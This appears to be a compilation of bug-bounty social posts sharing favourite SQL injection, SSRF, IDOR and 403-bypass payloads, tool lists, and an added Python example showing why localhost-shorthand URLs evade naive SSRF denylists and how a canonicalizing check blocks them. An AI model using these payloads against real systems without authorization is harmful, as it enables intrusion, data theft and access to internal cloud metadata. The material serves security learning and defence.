My favorite SQL injection payloads:
- 'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
- ')/**/OR/**/MID(0x352e362e33332d6c6f67,1,1)/**/LIKE/**/5/**/#
- 1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)'
I collected these from HackerOne reports.
Behi
Bug Hunter & Tool Builder.
- My favorite SSRF payloads:
  - http://00000
  - http://2130706433
  - http://0x7f.1
  - http://metadata
  SSRF blacklists are the easiest to bypass.
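Why those four URLs walk past a string blacklist: the filter compares the raw hostname, but the socket layer canonicalizes it first. The Python below is an added example, not code from the post above. It reimplements the shorthand IPv4 forms that inet_aton accepts (a bare number, hex or octal components, fewer than four dotted parts) so you can see what each payload really resolves to, then contrasts a naive denylist with a check on the canonical address. NAIVE_DENYLIST is a made-up weak filter, and FAKE_DNS, which maps the bare name "metadata" to 169.254.169.254, is a constructed stand-in for a resolver so the script runs offline; both are assumptions for the demo.

```python
import re
import ipaddress
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# A string-matching denylist of the kind the payloads above bypass.
# Constructed for this example; not from the original post.
NAIVE_DENYLIST = {"127.0.0.1", "localhost", "0.0.0.0", "169.254.169.254"}

# Constructed stand-in for DNS so the example runs offline. Mapping the bare
# name "metadata" to the link-local metadata address is an assumption made
# here for the demo, not a lookup result.
FAKE_DNS = {"metadata": "169.254.169.254"}

PAYLOADS = ["http://00000", "http://2130706433", "http://0x7f.1", "http://metadata"]


def _legacy_component(part: str) -> int:
    """Parse one dotted component the way inet_aton does: 0x hex, leading-0 octal, else decimal."""
    if re.fullmatch(r"0[xX][0-9a-fA-F]*", part):
        return int(part[2:] or "0", 16)
    if re.fullmatch(r"0[0-7]+", part):
        return int(part, 8)
    if re.fullmatch(r"0|[1-9][0-9]*", part):   # "08" is rejected, as inet_aton does
        return int(part, 10)
    raise ValueError(f"not an inet_aton component: {part!r}")


def parse_legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """
    Canonicalize the shorthand forms inet_aton accepts (a, a.b, a.b.c, a.b.c.d).
    All components but the last must fit in one byte; the last one fills the
    remaining bits, so "0x7f.1" is 127 followed by 1 spread over 24 bits.
    Returns None for anything that is not such a form (e.g. a DNS name).
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        return None
    try:
        values = [_legacy_component(p) for p in parts]
    except ValueError:
        return None
    *head, last = values
    if any(v > 255 for v in head):
        return None
    remaining_bits = 8 * (4 - len(head))
    if last >= 1 << remaining_bits:
        return None
    packed = 0
    for v in head:
        packed = (packed << 8) | v
    packed = (packed << remaining_bits) | last
    return ipaddress.IPv4Address(packed)


def canonical_address(host: str) -> Optional[ipaddress.IPv4Address]:
    """Numeric shorthand first; otherwise consult the (fake) resolver."""
    addr = parse_legacy_ipv4(host)
    if addr is not None:
        return addr
    resolved = FAKE_DNS.get(host.lower())
    return ipaddress.IPv4Address(resolved) if resolved else None


def naive_is_blocked(url: str) -> bool:
    """The weak check: compare the raw hostname string against a denylist."""
    return (urlsplit(url).hostname or "") in NAIVE_DENYLIST


def hardened_is_blocked(url: str) -> bool:
    """Decide on the canonical address, and fail closed when there is none."""
    host = urlsplit(url).hostname
    if not host:
        return True
    addr = canonical_address(host)
    if addr is None:
        return True
    return (addr.is_loopback or addr.is_private or addr.is_link_local
            or addr.is_unspecified or addr.is_multicast or addr.is_reserved)


def audit(urls: List[str] = PAYLOADS) -> Dict[str, Dict[str, object]]:
    """Show, per URL, what it really points at and what each check decides."""
    report = {}
    for url in urls:
        host = urlsplit(url).hostname or ""
        addr = canonical_address(host)
        report[url] = {
            "canonical": str(addr) if addr else None,
            "naive_blocked": naive_is_blocked(url),
            "hardened_blocked": hardened_is_blocked(url),
        }
    return report


if __name__ == "__main__":
    for url, row in audit().items():
        print(f"{url:24} -> {row['canonical']!s:16} "
              f"naive={row['naive_blocked']} hardened={row['hardened_blocked']}")
```

All four payloads come back with naive_blocked False and hardened_blocked True; the first three canonicalize to 0.0.0.0 or 127.0.0.1 without any DNS at all. In a real filter, replace FAKE_DNS with an actual resolution step, check every address the name returns (IPv6 included), and re-run the check on each redirect target, since a name can legitimately resolve to a public address at check time and to an internal one at connect time.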
- IDOR Trick: If you're dealing with a UUID-based IDOR, try this: 00000000-0000-0000-0000-000000000000 This might expose default objects or unintended access.
- My favorite 403 bypass payloads:
  - X-Forwarded-For: 127.0.0.1
  - /dir/..;/dir/
  - Host: localhost
  - /admin -> /Admin
  - /file/../file
  What are your favorite payloads?
-
  - First Bounty Roadmap is free
  - PortSwigger Labs is free
  - PortSwigger Academy is free
  - Burp Community is free
  - HackerOne is free
  Everything you need to start bug hunting is free.
- I missed many bugs because I didn't have good wordlists. This repo contains curated wordlists to fuzz smarter.
- These are the bug bounty tools I use:
  - ffuf
  - waybackurls
  - LinkFinder
  - Arjun
  - cloud_enum
  What do you use?
- If you're looking for SQL injection payloads, You can find a comprehensive collection here: github.com/payloadbox/sql…
- I found a simple IDOR that turned into an account takeover. The bounty? $5,000. Here’s exactly how I found it 🧵👇
- This is an interesting write-up on turning a limited path traversal into $40K. If you fuzz the target enough, there's always something interesting:
- API testing is a goldmine in bug bounty. Learn the tricks here:
- SSRF bugs are more common than you might think. Learn the tricks here:
- Bug Bounty Tool: SwaggerSpy automates OSINT on SwaggerHub to find exposed Swagger files and potential secrets.
- Bug Bounty Tool: XSSTRON helps detect XSS bugs automatically while browsing the web.

